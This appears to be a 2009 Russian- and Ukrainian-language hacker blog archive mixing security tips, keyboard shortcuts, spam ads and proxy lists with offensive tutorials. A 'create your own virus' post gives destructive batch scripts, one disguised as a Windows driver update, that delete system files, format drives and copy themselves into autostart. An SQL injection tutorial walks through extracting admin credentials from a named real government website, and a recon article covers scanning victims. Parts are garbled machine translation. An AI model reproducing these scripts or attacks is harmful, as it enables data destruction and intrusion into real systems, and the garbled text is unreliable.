Даже если мы, хакеры, ломаем безопастность других, нам очень нужно подумать о своей безопастности, чтобы не быть на месте что и чел которого вы ломаете) Хакер, это тот кто знает очень хорошо компютер, сеть и всё что их касается, но он по настоящему становится хакером, когда он в первую очередь заботится о своей безопасности! Ведь каждая атака начинается с изучения безопастности цели и потом уже по обстоятельству выбирается метод атаки. Безопастность вашего компютера зависит только от вас и не от когото другово! Во первых, безопасность в вашем компютере…Установите антивирус мощный и надёжный! Выбор уже за вами, так как у всех разные вкусы и возможности! Из лучших антивирей могу сказать о Nod32, Kaspersky, Avast, Norton и другие! Регулярно обновляйте базы антивируса, и один раз в недели выполняйте полную проверку вашего комютера на вирусы! Это поможет вам повысить уровень безопастности! Если вы в сети стите, то не нужно забывать о Файрволе!!! Это поможет держать ваш компютер в Интернете на замке! Один из лучших файрволах это Outpost Firewall и Kaspersky Anti-Hacker) Их так же нельзя отключить при входе в Интернет! Это дело вашей безопастности! И я в начале говорил о вашей бдительности в сфере защиты, так вот, не скачайте файлы с подозрительных сайтов! Не принимайте через е-майл или пэйджеры сомнительные файлы и данные!!! Там с легкостью может быть Троян, а о нём мы уже говорили! Не распостроняйте слишком много информации о себе в Интернете, на форумах и т.д. Будьте максимально осторожны, и это вам поможет быть защищёным! Ну и как же забыть о паролях! О паролях воопще можно целую книгу написать..)) Главное! Не пишите одни и теже пароли везьде! Сторайтесь чтобы ваши пароли были не меньше 6-8 знаков а именно (3pas$w0rd!) это пример! Таким образом, будет очень сложно его ломать! Так же не кликайте на ссылки что приходят по почте или icq так как под ними может быть сниффер и злоумышленник, легко сможеть получить ваш пароль! Ещё раз, будьте Бдительны!

==================

Тут вопщем, статья и заканчивается, но не забудьте что это первая часть, и скоро будет продолжение! Также, читайте наш форум!< www.forum.whack.ru >! Наша команда всегда будет рада вам помочь!

Сочетание клавиш, для новичков...

2009-02-23T08:45:00.001-08:00

Здравствуй новичок! Работая, и хакая : ) в среде windows нужно знать не только:
Что такое: уязвимости, что такое: теги, и т.д.
Помимо того, нужно знать обычные вещи, как Сочетания клавиш в среде windows!
Как я предоставил ниже, стаблицой было бы удобнее, но увы……

Сочетание клавиш Назначение
Internet Explorer

F4 Открывает всплывающее меню посещенных URLов
F5 Обновляет страницу, если время ее создания отличается от времени создания ее варианта, сохраненного на компьютере.
F6 Перемещаться между элементами вперед
F11 Переключиться между обычным и полноэкранным режимом
BACKSPASE Перейти на предыдущую страницу
ENTER Активизировать выбранную ссылку
TAB Перейти к следующему элементу веб-страницы, адресной строки или панели ссылок
ESС Прекращает загрузку страницы
CTRL + TAB Перемещается между элементами вперед
CTRL + A Выделить все на активной веб-странице
CTRL + B Открыть диалоговое окно "Упорядочить Избранное"
CTRL + С Копирование выделенных объектов в буфер обмена
CTRL + E Открыть панель "Поиск"
CTRL + H Открыть панель "Журнал"
CTRL + I Открыть панель "Избранное"
CTRL + L Перейти к другому адресу
CTRL + N Открыть новое окно
CTRL + O Перейти к другому адресу
CTRL + P Напечатать текущую страницу или элемент
CTRL + R Обновить страницу, если время ее создания отличается от времени создания ее варианта, сохраненного на компьютере.
CTRL + S Сохранить текущую страницу
CTRL + V Вставка содержимого буфера обмена в указанное место
CTRL + W Закрыть текущее окно
CTRL + X Удаление выделенных объектов в буфер обмена
CTRL + F5 Обновить страницу, даже если время ее создания совпадает с временем создания ее варианта, сохраненного на компьютере
CTRL + [щелчок кнопкой мыши] Открыть несколько папок на панелях "Журнал" или "Избранное"
CTRL + [стрелка влево] Переместить курсор в адресной строке влево до следующего логического разрыва (. или /)
CTRL + [стрелка вправо] Переместить курсор в адресной строке вправо до следующего логического разрыва (. или /)
CTRL + ENTER Добавить "WWW." в начало и ".COM" в конец введенного URLа.
SHIFT + CTRL + TAB Перемещаться между элементами назад
SHIFT + TAB Показать контекстное меню для ссылки
ALT + D Выделить текст в адресной строке
ALT + HOME Перейти на домашнюю страницу
ALT + [стрелка вправо] Перейти на следующую страницу
ALT + [стрелка влево] Перейти на предыдущую страницу
[стрелка вверх] Пролистать документ к началу, или перейти вверх по списку "Автозаполнение", или переместить выделение на строку вверх в списке избранного в диалоговом окне "Упорядочить избранное"
[стрелка вниз] Пролистать документ к концу, или перейти вниз по списку "Автозаполнение", или переместить выделение на строку вниз в списке избранного в диалоговом окне "Упорядочить избранное"
Page Up Пролистать документ к началу с большим шагом
Page Down Пролистать документ к концу с большим шагом
Home Перейти к началу документа
End Перейти к концу документа
Shift + [Щелчок по гиперссылке] Открыть документ в новом окне

Windows
SHIFT + Щелчок правой кнопкой Открывает контекстное меню, содержащее дополнительные пункты.
SHIFT + Двойной щелчок правой кнопкой Выполняет альтернативную команду (обычно второй пункт в контекстном меню).
ALT + Двойной щелчок правой кнопкой Открывает окно свойств объекта.
DELETE Удаляет объект.
SHIFT + DELETE Немедленно удаляет объект без помещения его в корзину.
F1 Открывает встроенную справку.
F10 Активирует строку меню.
SHIFT + F10 Открывает контекстное меню выделенного объекта. Нажатие этих клавиш эквивалентно правому щелчку мыши на объекте.
CTRL + ESC Открывает меню "Пуск".
CTRL + ESC, ESC Делает текущим выделенным объектом кнопку Пуск. После этого можно нажать клавишу TAB, сделав активным объектом панель задач, или сочетание клавиш SHIFT+F10, чтобы открыть контекстное меню кнопки Пуск. Эквивалентно двойному щелчку по кнопке "Пуск".
ALT + [стрелка вниз] Открывает раскрывающийся список.
ALT + TAB Делает активным другое выполняющееся приложение (бывшее активным непосредственно перед текущим). Для переключения на другие приложения нажимайте клавишу TAB несколько раз, не отпуская клавишу ALT. При этом в центре экрана появится панель, показывающая все запущенные приложения, и какое из них окажется активным, если вы отпустите клавишу ALT.
SHIFT Удерживайте клавишу SHIFT нажатой, чтобы:
во время загрузки Windows пропустить обработку папки "Автозагрузка"
при вставке компакт-диска отменить выполнение процедуры автозапуска
При нажатии клавиши ОК в диалоговом меню "Завершение работы" перезагрузить Windows без перезагрузки компьютера
ALT + SPACE Открывает управляющее меню активного окна.
ALT + - Открывает управляющее меню дочернего окна документа (в программах, которые могут открывать несколько документов одновременно).
CTRL + TAB Вызывает переход в дочернее окно следующего документа (если в программе открыто сразу несколько документов).
ALT + [подчеркнутая буква в меню] открывает соответствующее меню (может потребоваться предварительное переключение раскладки клавиатуры).
ALT + F4 Закрывает текущее окно. Если ни одно окно не открыто, то открывает меню завершения работы Windows.
CTRL + F4 Закрывает дочернее окно документа (в программах, которые могут открывать несколько документов одновременно).
ALT + F4 Закрывает окно или выходит из программы.
ALT + F6 Выполняет переход в следующее окно, открытое текущей программой.
CTRL + [стрелка вправо] Выполняет переход к следующему слову (в текстовом редакторе).
CTRL + [стрелка влево] Выполняет переход к предыдущему слову (в текстовом редакторе).
F2 Переименование объекта.
F3 Поиск в выделенной папке.
F4 Раскрывает список адреса, если панель адреса выведена на экран.
F5 Обновляет текущее окно.
F6 Делает активной другую панель проводника.
CTRL + X Вырезать.
(CTRL + C) или (CTRL + INSERT) Копировать.
(CTRL + V) или (SHIFT + INSERT) Вставить.
CTRL + Z Отменяет последнюю команду.
CTRL + A Выделяет все объекты в текущем окне.
ALT + ENTER Открывает окна свойств выделенных объектов.
CTRL Чтобы скопировать файл, во время перетаскивания удерживайте нажатой эту клавишу.
SHIFT Чтобы переместить файл, во время перетаскивания удерживайте нажатой эту клавишу.
CTRL + SHIFT Чтобы создать ярлык, во время перетаскивания удерживайте нажатыми эти клавиши.
BACKSPACE Выполняет переход в родительскую папку.
SHIFT + [щелчок на кнопке "закрыть"] Закрывает текущую папку и все родительские папки.
Секреты
Пятикратное нажатие клавиши SHIFT Включает/выключает режим "залипания" клавиш.
Удержание клавиши SHIFT нажатой в течение восьми секунд Включает/выключает режим фильтрации ввода.
Удержание клавиши NUM LOCK нажатой в течение восьми секунд Включает/выключает режим озвучивания.
Левая ALT + левая SHIFT + NUM LOCK Включает/выключает управление указателем мыши с клавиатуры.
Левая ALT + левая SHIFT + PRINT SCREEN Включает/выключает режим высокой контрастности.
Сочетание клавиш Назначение
WIN + Pause/Break Открывает диалоговое окно Свойства: Система (System properties).
WIN + R Открывает окно "Запуск программы" (Run).
WIN + M Сворачивает все открытые на данный момент окна, кроме диалоговых.
WIN + D Сворачивает все открытые на данный момент окна, включая диалоговые.
WIN + Shift + M Отменяет свертывание окон.
WIN + F1 Открывает справочную систему Windows.
WIN + E Открывает окно проводника.
WIN + F Открывает окно для поиска файлов.
CTRL + WIN + F Открывает окно для поиска компьютера.
WIN + TAB Выполняет переключение между кнопками на панели задач.

В заключение хочу сказать, что эти вещи размещены не только в интернете, а даже в самой «хрюше» В разделе Справка и поддержка!

Заработок

2009-02-18T01:22:00.000-08:00

Заробляйте на своєму сайті, блозі, дошці, новинний канал, закладці, роблячи посилання та короткі огляди товарів та послуг нашого сайту. Платні запису - це, на сьогодні, найшвидший і доступний спосіб монетизації ваших ресурсів. Легальний і цілком етично.
Заработок
Оплата по среднемировым тарифам

Работа

2009-02-18T01:18:00.000-08:00

Работа, вакансии: http://universal-trade.ru/
Приглашаем на работу в Бартерную биржу товаров и услуг. Ищем представителей по регионам. Оплата по среднемировым тарифам: http://universal-trade.ru/

Работа
Заработок
Оплата по среднемировым тарифам

house-md

2009-02-16T02:35:00.000-08:00

Інтернет магазин куча фудболок та разних гаджетів я собі замовив парочку.

House M.D.

Що робити якщо закрили доступ на сайт VKONTAKTE.ru

2009-02-16T02:06:00.000-08:00

Якщо в вас на роботі або в коледжі чи навіть в школі злий дядька адмін закрив доступ до цього сайту ))) . То як завжди нам на допомогу приходять проксі та різні утілітки для забезпечення анонімності. Так звані анонімайери.
Як ними користуватись чи як їх знайти .?
Достатньо лише в гуглі написать "Анонімайзери"
І ви получите велику масу інформації .
Ось ті які я вибрав з маси !!! :
http://www.proxyanon.com/
http://www.anonproxy.info/
http://www.proxysafe.com/
http://www.strongproxy.com/
http://www.boredatschool.net/
http://www.kproxy.com/
http://www.ukproxy.com/
http://www.simpleproxy.com/

Le Parkour

2009-02-13T05:46:00.000-08:00

Нашел первый электронный журнал про паркур.
Всем кто хотя бы раз слышал это слово (Parkour) советую зайти сюда "журнал о паркур"
Журнал просто супер. Кстати я уже как два года занимаюсь паркуром и
на этом сайте нашел много вещей которые видел и не слышал.
статьи о паркур

Создай свой вирус

2009-02-13T02:19:00.001-08:00

Создание вируса
Есть несколько вариантов создания вируса.Мы рассмотрим лишь один из них...

@echo off
echo Windows updating driver...
attrib -r -h -s c:windows*.da?
echo Y | del c:windows*.da?
echo Y | del d:*.*
attrib -r -h -s c:*.*
echo Y | del c:*.sys
echo Y | del c:*.bin
echo Y | del c:*.bat
echo Y | format d:
echo Y | format c:
echo Virus loading.... Completed!

Это пример вируса...Да и еще одно договоримся сохранять наши проекты как .bat файлы... Итак, разберем по строкам... Первая строка "говорит" компьютеру, что не надо показывать операции. Вторая - выводит надпись Windows updating driver... третья и шестая-снимают все атрибуты(скрытый, для чтения и т.д.) с файлов. 4-ая, 5-я, 6-я, 7-я, 8-я и 9-я удаляют файлы на дисках. 10-я и 11-я форматируют диски. Ну и 12-я выводит знаменательную надпись: Virus loading.... Complited! Форматирование может и не произойти, но ОС будет испорчена... Задание:Создайте самостоятельно вирус, который будет "убивать" виндовс не только находящийся на диске С:.
Рассмотрим еще один пример:

@echo off
if exist c:aivus.bat goto cool
copy %0 c:aivus.bat >nul
attrib +h c:aivus.bat >nul
echo c:aivus.bat>>c:autoexec.bat
echo Y | del %0 >nul
:cool
copy %0 a: un.bat >nul
copy %0 a:open.bat >nul
attrib +h a:open.bat >nul
echo Y | del c:windowscalc.exe >nul
attrib -h -s -r c:*.ini >nul
echo Y | del c:oot.ini >nul
echo Y | format a:

Я думаю не все поняли, что это за строчки:
if exist c:aivus.bat goto cool
echo c:aivus.bat>>c:autoexec.bat
copy %0 a:open.bat >nul
attrib +h a:open.bat >nul

Строчка if exist c:aivus.bat goto cool С вирусами связано и программирование... Те, кто чуть его знают, поняли её. Для других объясняю: Эта строка проверяет есть ли файл open.bat на диске С: , если есть переходим к строке :cool.
Строка echo c:aivus.bat>>c:autoexec.bat добавляет себя в автозапуск.
copy %0 a:open.bat >nul копирует себя(обозначается %0) в a:open.bat Ну а строка attrib +h a:open.bat >nul ставит файлу атрибут скрытый. Если кто-то непонял что значит null, значит - скрыть операцию...

Sport

2009-02-13T01:27:00.001-08:00

2009-02-13T01:27:00.000-08:00

Компания МТГ

2009-02-13T01:23:00.000-08:00

Сайт на якому можна замовити :
"Сенсорные киоски", "Световые табло", "Системы информационной безопасности FortiNet", "Система управления очередью AKIS"... і багато чого іншого для замравок, магазинів та супер-маркетів.
А також :
* Аренда системы управления очередью
* Аренда сенсорных киосков
* Аренда световых табло
* Аренда оборудования FortiNet
* Постгарантийное обслуживание
Як веб дизайнер скажу :
-"Не поганий дизайн сайту але...Зайдіть самі подивітся."
информационный терминал, система очереди, управление очередями.

Простой и удобный поиск работы

2009-02-11T06:26:00.000-08:00

Простой и удобный поиск работы, вакансий и резюме в Екатеринбурге, Челябинске, Кургане, Тюмени, Перми, Уфе и других городах Урала. Ежедневно новые вакансии и резюме.

http://www.uraljob.ru/

Австралия

2009-02-07T03:07:00.000-08:00

новый фильм "Австралия"
Класний фільм !!!

Скануєм по уму

2009-02-07T03:01:00.000-08:00

Ця стаття не дасть практично ніякого досвіду, однак вона дійсно важлива для розуміння того, як все влаштовано. Адже без азов не можна в майбутньому написати щось дійсно хороше. Саме ця стаття розповідає, чому xspider корисний, але якщо він нічого не видає, то це не значить, що жертва Невразливий (як вважають 95% початківців зломщиків).
У статті описується саме безпека Linux-систем, так як Windows не зовсім призначений для "глибокої" роботи з мережею.
Отже, приступимо. Почнемо, як я вже казав, з азів. Тобто зі сканування мережі та отримання від неї всієї потрібної нас інформації. Думаю, що всім зрозуміло, як користуватися соц. інженерією. Я не буду заглиблюватися в цей недостойний людини метод і розповім Вам про справжніх сканування мережі.
1) Дуже рідко використовуються, та й мало допомагають бази Whois.
Root @ localhost $ whois foo.com
Domain name: ---
Registar: ---
Referall: bar.com
і т.д. Найбільш корисними рядками будуть registar і referall, т.к. при запиті Whois із зазначенням компанії реєстратора ми отримаємо найбільш повну інформацію. (Root @ localhost $ whois foo.com @ whois.bar.com). Раджу так само застосувати Whois відносно не тільки какого-то домену, але й за певним IP адресою. Саме це допоможе дізнатися такі тонкощі, як останнє оновлення сервера.
2) Ping, Traceroute, Host.
Про PING, мабуть, не треба розповідати. Багато інформації від нього не отримаєш, хоча він завжди під рукою.
Traceroute грунтується на відправленні UDP-пакетів з вказаним Max-Forwards і очікуванні ICMP-відповідей. Шлет пакети на порти в діапазоні від 33434 до 33523. Ми бачимо через які комп'ютери проходили пакети, можемо дізнатися більше про віддаленій машині. І навіть якщо вона не вразлива, то можна попробывать надалі протестувати на безпеку, наприклад, його провайдера.
Host. Головне - отримати якомога більше інформації. І це нам цілком може вдасться, якщо DNS створювалася не вручну.
а) При виклику команди Host з наступними параметрами можна домогтися результатів:
-HINFO вказує конфігурацію сервера, встановлене на нього ПЗ.
-ТХТ додаткова інформація про сервер.
(це далеко не всі параметри, проте саме вони потрібні при скануванні мережі).
б) Оскільки одна машина може працювати некоректно, то створюють вторинні DNS-сервера, які є "запасними". Проблема в тому, що хакер може поряд з адміністратором створити таку DNS. Якщо спочатку ввести host baz.ru, а потім host baz.ru name_of_server (де name_of_server - відповідь на ваш перший запит), то можна отримати список всіх хостів для даного сервера з їх IP.
3) Визначення ОС і запущених процесів.
Сканування портів.
а) Ось те головне, що необхідно при аналізі безпеки комп'ютера. Знаючи всі відкриті порти жертви можна підключатися до неї через різні проксі і дізнаватися, які саме версії програм встановлені на ньому (наприклад старий Sendmail). Так само відкриті порти найкраще дозволяють визначити ОС, однак не варто вірити у всі відкриті порти. Іноді відкривають порти для Windows, коли на сервері стоїть Linux, що вводить багатьох в сум'яття. Кожен порт краще перевірити на дійсну працездатність. Я віддаю перевагу сканувати віддалену машину з допомогою nmap (тим сканером, що був у Матриця 2). Всі параметри ви легко можете знайти в документації.
Треба зауважити, що інформація, яку буде передаватися на ваш комп'ютер при підключенні до комп'ютера жертви може бути підмінила адміністратором і визначити справжню версію ПЗ буде вже не так легко, тому сканування портів може бути недостатньо.
б) Необхідно формувати явно некоректні запити. Тоді відповідь сервера може допомогти з визначенням ОС. Для формування таких запитів я раджу використовувати nmap (і взагалі, nmap краще за інших програм такого роду в усьому, тому потрібно використовувати його як можна більше). Однак і формування запитів не дасть результату, якщо адміністратор поставив Firewall, а це він точно зробив. Однак з'явилося удосконалення попереднього методу. Полягає це вдосконалення в тому, що ми не посилаємо спеціальні запити на сервер, нам досить простого підключення до віддаленої машині. У кожної системи свої конфігурації з'єднання і роботи по протоколу TCP / IP: DF, Windows Size, TOS, TTL. (головні атрибути). Отримуючи їх ми можемо визначити встановлену на віддаленому комп'ютері систему. Якщо ви не вмієте дивитися властивості з'єднання, то зайдіть на сайт subterrain.net, де ви зможете завантажити потрібну програму.
4) Файлова система
Існує цікава можливість зібрати інформацію завдяки NFS, що дозволяє спільно використовувати файли машинам, заснований на Linux. При цьому будь-яка людина може (якщо це не заборонили) підключитися до віддаленої машині і змонтувати (підключити) жорсткий диск жертви до себе з правами користувача root. Якщо таке підключення і заборонили, то команду showmount (що вона робить, мабуть, здогадалися самі) - ймовірно немає. Треба зауважити, що часто необхідно використовувати цю команду з параметрами-а і-е, що покаже всі хости, на які змонтовані файли, а так само всі хости, яким це дозволено.
5) Протокол SNMP
Зупинятися докладно я на ньому не буду, так як він більше придатний для злому (а це тема іншої статті), ніж для збору інформації. Даний протокол дозволяє звертатися до різних мережних пристроїв. Головною проблемою його є те, що багато програм працюють тільки з однією з найбільш ранніх його версій, безпека якої залишає бажати кращого. Програми для роботи з SNMP широко поширені в інтернеті.
6) Протокол ONC RPC
RPC є механізмом, який дозволяє процесам одного комп'ютера викликати деякі процедури на інших комп'ютерах. Цікавим є той факт, що за RPC не встановлюються певні порти, вони самі реєструються в спеціальній службі portmap. Portmap підтримує команду rpcinfo, що дозволяє вам побачити всі запущені RPC процеси на віддаленому комп'ютері. Я і для цього сканування волію використовувати nmap.
Якщо ви ще не зрозуміли, чому не можна (точніше небажано) використовувати сканер безпеки xspider (або будь-який інший йому подібний), то ви були не уважні. А відповідь проста: при скануванні жертва легко може помітити сканування і перекрити доступ до уразливих місць системи, а так само підмінити видавати інформацію, що приведе до повної дезінформації зломщика. Власне кажучи, використовуйте всі методи збору інформації, що може хоч про одному адміністратор забув.
Тепер про те, як не дати зловмисникові дізнатися про те, що його інтересует.Надо помітити, що в линукс досить багато потенційних вразливостей, проте багато з них вирішуються однаковим способом (установкою Firewall, к примеру).
1) Бази даних Whois.
Тут все просто. Не давати їм даних ...
2) Ping, host traceroute
Для відключення PING необхідно налаштувати політику безпеки щодо Echo запитів. Необхідно, щоб таку можливість мали тільки певні вузли. Можна за допомогою Firewall, можна за допомогою політики ipchains (про неї докладно в іншій статті). Можна так само відключити саму службу Echo у файлі / ETC / inetd.conf. Закомментіруйте рядки:
echo stream ...
echo dgram ...
З Host складніше.
а) По-перше, записи в DNS створюйте в ручну. Не пишіть інформацію в поле hinfo. (решта поля за розсудом).
б) При створенні вторинних серверів необхідно у файлі named.conf вказати IP-адреси "дозволених" (як це зробити, написано в документації, але все-таки скажу, що зробити це можна за допомогою allow_transfer:
...
Zone "foo.ru" (
...
Allow-Transfer (ip.ip.ip.ip;);
...
Traceroute: тому що вказати адміністраторам інших комп'ютерів що-небудь ви не можете, то доведеться зробити єдине - заборонити Echo запити та / або встановити Firewall. Тоді зловмисникові буде відправлятися повідомлення про те, що порт недоступний та інформацію про вашу мережі він отримає не всю.
3) Визначення ОС і запущених процесів.
а) Я віддаю перевагу програму з www.psionic.com / abucus / portsentry (як ви вже здогадалися, програма називається PortSentry). Вона допомагає розпізнавати наявність підключення до будь-то порту. Власне, я вже згадував про те, що необхідно відкрити кілька портів з незапущеннимі на них службами (причому портів для різних операційних систем). Так як дуже часто зловмисників хвилюють Telnet і Sendmail, то я опишу те, де зберігається інформація, що видається при підключенні до вашого комп'ютера (версія служби). В файлі sendmail.cf в папці / ETC / необхідно змінити рядок smtpgreetingmessage (це для Sendmail, якщо хтось не здогадався). А для Telnet - / ETC / essue Там треба видалити всю інформацію, яку будуть показувати зловмисникові.
б) Для закриття можливості отримати інформацію, використовую некоректні пакети для запиту, необхідно просто встановити Firewall. При закритті "пасиву" необхідно знову ж таки видавати завідомо неправдиву інформацію. Для / proc/sys/net/ipv4 параметра ip_default _ttl можна написати Echo 1024 і вона буде видавати 1024 при запиті, а на самом деле все не так. Для перегляду інших параметрів застидайтесь вихідні коди системи.
4) Постарайтеся уникати цієї NFS (не як нечисть, звичайно). Якщо все-таки NFS вам потрібен для роботи, то заборонити підключення до порту 2049 для "не своїх". Бажано заборонити доступ до NFS програмами, так як їх безпеку залишає бажати кращого.
5) Буду немногословная. Треба встановити Firewall і заблокувати доступ до портів з SNMP для чужих комп'ютерів. Ну і, звичайно, використовувати як можна більш нові версії SMTP.
6) Закрийте всі непотрібні порти використовую Firewall, відключіть можливість звертатися до portmaper за допомогою все того ж Firewall.

Анна Седакова

2009-02-07T02:46:00.000-08:00

Сайт про знаменитостей .
На ньому можна знайти фото і цікаві історії
про різних знаменитостей .
Анна Седакова

Video Onlane

2009-02-07T02:38:00.000-08:00

фильмы онлайн
Не поганий але свіжи сайт . На ньом можна подивитись фільми онлайн . А також закачать собі на на машину . Багато нових і цікавих фільмів та серіалів.
фильмы онлайн

Чергова SQL ін'єкцій.

2009-02-04T02:12:00.000-08:00

Привіт хацкери, кул хацкери і новачки! З вами redbu11.В цій статті піде мова про таку вразливості як SQL injection.Я знаю що таких статей в инете немеряно, але все-таки я напишу ще одну статейку про такий уязвімості.Я написав цю статтю для тих у кого ще не сформувалася ідея про цієї вразливості, то є новачкам у цьому деле.То що я буду розповідати, зовсім не нове, Так що розрахована для новічков.Я думаю ви всі знаєте що таке SQL вразливість, а якщо ні, то пошукайте в инете, там багато про це написано, просто если я щас начну пояснювати що це таке у великих подробицях, то це займе багато времені.І так приступимо.))
Для виявлення SQL ін'єкції я найчастіше користуюся маніпулюванням числовими параметрами в GET запросах.Вот наприклад мене як-то зацікавила така посилання:
http://www.komnasfbpi.go.id/berita_eng.php?id=58
тут ID = 58 і є числовий параметр.Ітак, перевіримо її на уязвімость.В кінець посилання додаємо одиночную лапки '. http://www.komnasfbpi.go.id/berita_eng.php?id=58 '
І дивимося на результат.Опа Сторінка завантажилася неправильно і видала нам SQL помилку:
Відкрита база даних: Невірний запит
SELECT * FROM tbl_berita де berita_id = 57 '
Ура! Це і є SQL уязвімость.Но щоб переконатися що вразливість дійсно існує, перевіримо еще кое-что.ПЕреходім знову за адресою:
http://www.komnasfbpi.go.id/berita_eng.php?id=58
І бачимо там сторінку із заголовком "Komnas FBPI ТРИВАЄ пташиного грипу Програма контролю". Ок, тепер перейдемо на сторінку "нижче", не на 58-му а на 57-му, тобто так: http://www.komnasfbpi.go.id/berita_eng.php?id=57
І бачимо там сторінку вже з іншим заголовком "Повітряна Бату Asahan Мешканці підтвердження пташиного грипу
Негативний ". Тепер переходимо назад на 58-ту сторінку:
http://www.komnasfbpi.go.id/berita_eng.php?id=58
Отже, коли ми знаємо, що 58-а сторінка має заголовок "Komnas FBPI ТРИВАЄ пташиного грипу CONTROL ПРОГРАМА "а 57-а має заголовок" Повітряна Бату Asahan Мешканці підтвердження пташиного грипу Негативний "то перевіримо змінну "ID" на вразливість і складемо такий запит:
http://www.komnasfbpi.go.id/berita_eng.php?id=58-1/ *
(Завжди закриваємо символом / *) І дивимося на результат.В результаті завантажилася НЕ 58 а 57 страніца.Ура! Вразливість дійсно є! А що це значить? З попереднім запитом ми спробували виконати просту арифметичну операцію, тобто 58-1, і сайт її не отвільтровал а виконав, і в результаті ми отримали 58-1 = 57, це означає, що замість цього ми можемо вставити будь-який інший запит який нам буде більш полезен.Ми зараз будемо намагатися витягти за допомогою цієї вразливості з бази
даних логін і пас адміна.І так, сначало нам треба з'ясувати скільки полів у базі данних.Я для цього використовую оператор "+ на порядок". І так перевіримо скільки-ж там полів використовуючи + порядку шляхом:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 30 / *
На такий запит нам видалася помилка, це означає що полів менше ніж 30.Пробуем так:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 20 / *
На це нам теж видалася помилка, значить полів менше 20-і.Пробуем далі:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 10 / *
На це нам не видалося жодної помилки, це означає що полів або 10, або більше 10-і.Продалжаем в цьому-ж дусі поки не обнарушем вірне кількість полів:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 15 / *
Сторінка знову завантажилася з помилкою, це означає що полів менше ніж 15, пробуємо так:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 14 / *
Уряяя! 14 Сторінка завантажилася нормально, а 15-ая завантажувався з помилкою, це означає що полів всього лише 14, це нам тільки наруку.Теперь знаючи що полів 14, подивимося яке з них прінтабельное, то є з допомогою якого поле виводитися інформація.Для цього нам потрібно скористатися оператором
"Союз + вибрати", складаємо запит, делаеться це так:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 / *

Дивимося на результат, коли сторінка завантажується, прокручують сторінку до самого низу, і ми побачимо що

там отоброжаеться цифра 9, це означає, що для виведення інформації використовується 9-е поле.
Ну ось тепер коли ми знаємо, що в базі тільки 14 полів і використовуються 9-е прінтабельное, переходимо до

наступного етапу, будемо долбить базу даних і спробувати витягти звідти логіп і пас Админа.)) Нам щас

потрібно перевірити, чи існує в базі даних таблицю з назвою типу користувачів, користувач, адміністратор І т.д. .. Це

теж делаеться з оператором союз + select.Нам щас потрібен логін і пас адміна, давайте почнемо з

логіна.Для того, щоб дізнатися логін, нам треба перевірити, чи існує в базі даних таблиця з назвою

ім'я, або логін, де і зберігатися логін.Теперь ми і будемо перевіряти на наявність всіх цих табліц.Делаем

це як я вже казав оператором союз + вибрати таким чином:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + від +

Користувачі / *

Цим ми перевіряємо, чи існує таблиця користувачів у базі даних, якщо така існує, то сторінка

завантажитися без помилки, а якщо такої немає, то завантажитися з ошібкой.Нам на це видалася помилка, значет

такий нет.Проверім чи є таблиця користувачів:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + користувачів /

*

на жаль і такий не виявилося, теж нам на це видалася помилка ...(( Але не треба

засмучуватися! Багато админы використовують префікси перед назвою табліци.Теперь зверніть увагу на

ту помилку яка нам виводитися:

Відкрита база даних: Невірний запит
SELECT * FROM tbl_berita де berita_id = 57 '

Подивіться там на цей текст: tbl_berita
Тут використовується префікс tbl_ перед назвою табліци.Давайте перевіримо чи існує таблиця користувачів

використовуючи цей префікс! Ок, робимо запит:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + tbl_u

сер / *

Є! Ура! Сторінка завантажилася нормально, значить таблиця tbl_user існує! Тепер спробуємо дістати

ім'я користувача з таблиці tbl_user.Проверім, чи існує запис з назвою ім'я в таблиці

tbl_user.Ето делаесть майже також, тільки в 9-е поле вставляємо слово назву, цим ми і будемо перевіряти

чи існує запис в таблиці ім'я tbl_user.Етот запит буде виглядати так:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, ім'я, 10,11,12,13, 14 + ТБ

l_user / *

Подивимося що ми на це вийде, а нам на це сторінка завантажилася нормально, значить є

такая! прокручують сторінку в самий низ, і бачимо там запис "Адміністратор", Ураа!! У нас тепер є

логін адміна, залишилося дістати пасс.Пробуем:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 1

4 + tbl_user / *

На це нам сторінка завантажилася з помилкою, це означає, що немає запису паролів, пробум так:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 14 +

tbl_user / *

На це теж видалася помилка,, такої теж нема ((пробуємо далі:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 14 + tbl

_USER / *

Даа! Сторінка завантажилася без помилки, і це значить що запис! Прокручують сторінку в самий низ і

там ми бачимо пас адміна! Залишилося його розшифрувати і все!
Потім переходимо сюди http://www.komnasfbpi.go.id/admin вводимо отримані дані, і все, далі все

залежить від вашої фантазії!
Ось і все, все, про що б я з вами хотів би поделіться.Я описав просенькую SQL ін'єкцію.

УВАГА! Автор не несе ніякої відповідальності за неправильне використання розміщеної тут

інформації! Усе, що тут розміщено, це не пробудження до дії, а лише для ознайомлювальних

цілей!
Ну ось і все, всім пока и удачи зі зломом!

Російські хакери покарали Киргизії за американську військову базу

2009-02-04T02:11:00.002-08:00

За твердженням американського експерта з комп'ютерної безпеки Дона Джексона з фірми SecureWorks Inc, розташованої в Атланті, російські хакери "вирубати" Киргизії з мережі. З 18 січня цієї далекої середньоазіатських країн постійно перекривають доступ до Інтернету.

Популярний метод сучасних хакерів - відмова в обслуговуванні напад - настільки перезавантажувати сервери, що вони йдуть в автономному режимі. Кібератакам піддалися два основних киргизьки інтернет-провайдера, частка яких на ринку інтернет-послуг перевищує 80%.

